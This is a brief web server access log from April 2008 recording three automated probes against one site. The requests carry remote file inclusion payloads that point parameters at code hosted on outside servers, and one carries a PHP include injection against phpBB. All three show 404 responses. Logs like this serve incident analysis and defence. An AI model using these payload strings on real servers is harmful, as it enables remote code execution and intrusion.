72.3.249.71 - - [01/Apr/2008:09:16:05 -0700] "GET /logs/skin/zero_vote/ask_password.php?dir=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.bsfadvisors.com"
72.3.249.71 - - [01/Apr/2008:09:16:06 -0700] "GET /skin/zero_vote/ask_password.php?dir=http://www.omegadm.co.uk/xxxnew/sIFR3/.inc/id.gif? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.0.1) Gecko/20060130 SeaMonkey/1.0" "www.bsfadvisors.com"
84.18.207.65 - - [01/Apr/2008:09:16:43 -0700] "GET /logs/access.log//index.php?name=PNphpBB2&file=viewtopic&t=8/viewtopic.php?p=15&sid=be4c914eb746ac7c96beea717fdfc692/&highlight=%27.include($_GET[a]),exit.%27&a=http://www.atlant.ru/sms/img/images.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.bsfadvisors.com"
